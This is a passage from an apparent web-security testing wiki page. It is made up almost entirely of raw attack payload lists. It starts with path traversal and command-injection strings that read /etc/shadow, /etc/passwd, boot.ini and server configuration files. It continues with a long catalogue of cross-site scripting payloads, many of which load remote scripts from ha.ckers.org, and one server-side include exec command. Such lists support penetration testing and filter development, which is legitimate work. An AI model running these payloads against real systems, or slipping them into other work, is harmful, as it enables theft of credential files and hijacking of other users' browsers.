/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
